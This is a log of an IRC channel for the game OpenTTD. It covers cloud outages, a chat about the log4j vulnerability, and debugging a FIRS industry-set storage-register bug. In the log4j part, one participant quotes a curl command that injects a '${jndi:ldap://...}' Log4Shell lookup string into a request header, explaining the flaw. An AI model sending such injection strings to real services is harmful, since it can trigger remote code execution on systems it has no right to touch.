Times are UTC Toggle Colours
12:56:43 *** WormnestAndroid has joined #openttd 13:42:46 *** sla_ro|master has quit IRC 14:01:36 <peter1138> I've used goto in some c# source... 14:01:45 <peter1138> Perhaps I need to reevaluate my life. 14:06:46 *** Etua has joined #openttd 14:18:42 *** Etua has quit IRC 14:24:16 *** Etua has joined #openttd 14:29:39 *** nielsm has joined #openttd 14:30:12 *** Etua has quit IRC 14:49:00 *** gelignite has joined #openttd 14:55:10 *** glx has joined #openttd 14:55:10 *** ChanServ sets mode: +v glx 14:56:19 *** colde_ has joined #openttd 14:57:10 *** gregdek_ has joined #openttd 14:57:54 *** mindlesstux_ has joined #openttd 14:58:16 *** colde has quit IRC 14:58:16 *** colde_ is now known as colde 14:59:31 *** gregdek has quit IRC 14:59:31 *** gregdek_ is now known as gregdek 15:00:56 *** mindlesstux has quit IRC 15:00:56 *** mindlesstux_ is now known as mindlesstux 15:01:41 *** ST2 has quit IRC 15:02:43 *** ST2 has joined #openttd 16:04:47 *** andythenorth has joined #openttd 16:04:50 <andythenorth> lol 16:05:05 <andythenorth> AWS, Cloudflare availability issues 16:05:08 <andythenorth> so NPM is down 16:05:13 <andythenorth> amongst other things 16:09:35 <LordAro> ah, that'll be why i couldn't download something a while ago 16:09:47 <TrueBrain> Hi andythenorth, https://log4jmemes.com/, love, TrueBrain 16:10:24 <andythenorth> this one is inaccurate https://dl.airtable.com/.attachments/2f7c668073cee9ddcb71ba2091a0ef2a/ad0d0c80/KDnmlxQ.png 16:10:34 *** Wormnest has joined #openttd 16:10:43 <TrueBrain> And cloudflare? Or cloudfront? 16:10:58 <dwfreed> I wonder if there's log4j in smart cards 16:11:01 * dwfreed ducks 16:11:08 <dwfreed> or blu-ray players 16:11:19 <andythenorth> I have to check my mesh wifi provider 16:11:24 <LordAro> or SIM cards 16:11:36 <andythenorth> does it matter if it's in the SIMs? 16:11:41 <andythenorth> it will be in the telco networks 16:11:57 <andythenorth> we are currently doing full DR planning 16:12:15 <dwfreed> LordAro: arguably SIM cards are just a subclass of smart cards :P 16:13:56 <LordAro> arguably, yes 16:39:01 *** iSoSyS has joined #openttd 17:09:13 *** frosch123 has joined #openttd 17:16:27 <frosch123> https://twitter.com/TheASF/status/1400875147163279374 17:17:06 <LordAro> oh no 17:17:35 *** Flygon has quit IRC 17:17:39 <frosch123> finally a good joke about *remote* code execution 17:55:10 <andythenorth> GG 18:07:39 <TrueBrain> I wonder how long the firmware update takes :P 18:09:05 <frosch123> esp. when the connection is already fully utilized by coin miners 18:23:47 <frosch123> hmm, i am not fluent enough in java to understand the root cause. is it because java has no warning "fomat not a string literal"? 18:24:44 <frosch123> and people logging strings directly using "logger.info(foo)", when they should use "logger.info("{}", foo)"? 18:26:01 <LordAro> also that one of those is essentially `eval <result from 3rdparty server>` 18:27:08 <frosch123> well, that's my main issue with the news... everyone talks about "there is a string formatter to execute code", but imho "external messages can contain format codes" is still broken 18:27:37 <frosch123> does noone care if "harmless string substituion" results in mess in the log file? 18:28:25 <frosch123> all the log4j patching feels like hiding/working around/mitigating a bug, instead of fixing it 18:28:29 <LordAro> mm, i'm not sure either 18:30:27 <LordAro> https://logging.apache.org/log4j/2.x/manual/api.html certainly suggests that you can do it without that 18:30:56 <LordAro> unless string parameters are also evaluated? which seems nuts, but so does the ability for your logging framework to make web requests 18:31:22 <frosch123> oof, that example in "substituteing parameters"... 18:31:49 <frosch123> it shows both methods 18:32:39 <frosch123> C people learned that the first version in invalid, and added warnings/errors. did java just miss that call? 18:34:25 <frosch123> oh, maybe the docs read like: "info("str" + foo)" is log4j 1.x, and "info("str {}", foo)" is log4j 2.x 18:34:40 <frosch123> though that does not make it any better 18:57:24 <andythenorth> so are we now mining on the moon? 18:58:32 <andythenorth> from what I read the log4j vuln is not a bug, it's firmly a feature, essential for backwards compatibility with the ecosystem 18:58:36 <andythenorth> in ways I didn't understand 18:58:45 <andythenorth> but I suspect LordAro has the appropriate XKCD to hand 19:13:02 <LordAro> 1172 or 972, perhaps? 19:13:05 <LordAro> or 1700 19:14:23 <andythenorth> 1700 is rather good 19:14:38 <andythenorth> I think 1172 is pertinent 19:16:21 <TrueBrain> frosch123: https://www.lunasec.io/docs/blog/log4j-zero-day/ to understand it in technical terms 19:16:40 <TrueBrain> but basically, no, escaping wasn't the issue on a user-level (from what I understand) 19:17:19 <TrueBrain> log.info("Requested Api Version:{}", apiVersion); 19:17:19 <TrueBrain> in a nutshell 19:17:19 <TrueBrain> curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}' 19:18:58 <TrueBrain> so the first shitty thing is that the jndi thing makes an external call, which of course is bananas on its own 19:19:16 <TrueBrain> the second shitty thing is that if you return a Java class, it is being executed, for "backwards compatible" reasons :P 19:19:34 <TrueBrain> (and that is why it carries a score of 10 (out of 10)) 19:21:23 <TrueBrain> andythenorth: no, the xkcd has been replaced by https://dl.airtable.com/.attachments/fc40ade9c20d8620461f8cb358b2467a/8006943c/image2.png 19:22:59 <andythenorth> the most important thing apparently was 'log for jay' or 'log forge' 19:23:11 <andythenorth> this is like PNG all over again 19:24:24 *** sla_ro|master has joined #openttd 19:28:00 <frosch123> TrueBrain: thanks, so format substitution happens multiple times then.. 19:28:30 <frosch123> xkcd 1700 is in fact pretty close :) 19:30:16 <andythenorth> like a prediction 19:30:40 <andythenorth> part of our infosec stance is based on 'act as though everything is probably already owned' 19:30:47 <andythenorth> and this year we got to find out why 19:41:31 <frosch123> this year a lof of things failed :) fb, aws, java-everything, my ipv6 connection, ... 19:42:22 *** Wormnest has quit IRC 19:48:01 <andythenorth> FIRS 19:48:19 <andythenorth> 4.4.0 has a bug that wipes out the value of perm register 2 sometimes, for reasons I don't see 19:48:38 <andythenorth> discord player gave me a confirmed repro of the result via screenshot 19:48:43 <andythenorth> but I don't know the trigger 19:49:25 *** WormnestAndroid has quit IRC 19:49:37 <andythenorth> there are no other registers getting obviously zero-ed so I suspect 100% chance it's my code, not openttd 19:50:01 <frosch123> just set a watchpoint :p 19:50:04 <andythenorth> unless sometimes certain callbacks can run closely and out of sequence 19:51:16 <frosch123> what does that mean? are you using the register as a message queue between callbacks? 19:57:36 * andythenorth looks 19:57:47 <andythenorth> I suspect maybe multiple callbacks write to it 20:02:37 <andythenorth> seems not, in 4.4.0 at least 20:02:52 <andythenorth> I have rewritten some of these subsequently, not released 20:04:39 <glx> maybe you need to search for all psto in the generated nfo 20:05:41 <frosch123> i would assume if andy uses one write-storage in a pynml template, it results in 1M instances in the nfo :) 20:06:05 <glx> yeah but with different values 20:06:37 <andythenorth> the behaviour apparently arises randomly 20:06:41 <glx> and as I understand the report on discord it doesn't happen for all industries 20:06:41 <andythenorth> with no obvious repro 20:07:12 <glx> hand placed one don't trigger the issue, only random placed ones 20:07:51 <andythenorth> I've never seen it in any test game either 20:08:23 <andythenorth> n 20:08:32 <andythenorth> lol mistype 20:10:17 *** Wolf01 has joined #openttd 20:10:27 *** Wormnest has joined #openttd 20:24:21 <glx> I found 17 STORE_PERM, but I don't understand their meaning :) 20:26:13 <andythenorth> I only see storage 2 written once per industry 20:26:32 *** nielsm has quit IRC 20:48:35 *** Eddi|zuHause is now known as Eddi|zuHause2 21:16:51 *** frosch123 has quit IRC 21:27:46 *** andythenorth has quit IRC 21:29:30 *** Eddi|zuHause2 is now known as Eddi|zuHause 21:34:17 *** andythenorth has joined #openttd 21:57:04 *** WormnestAndroid has joined #openttd 21:59:03 *** andythenorth has quit IRC 22:15:45 *** _aD has joined #openttd 22:15:58 *** Wormnest has quit IRC 22:16:30 *** WormnestAndroid has quit IRC 22:17:56 *** Wolf01 has quit IRC 22:18:48 *** WormnestAndroid has joined #openttd 22:32:53 *** gelignite has quit IRC 22:40:36 *** Wormnest has joined #openttd 23:06:30 *** sla_ro|master has quit IRC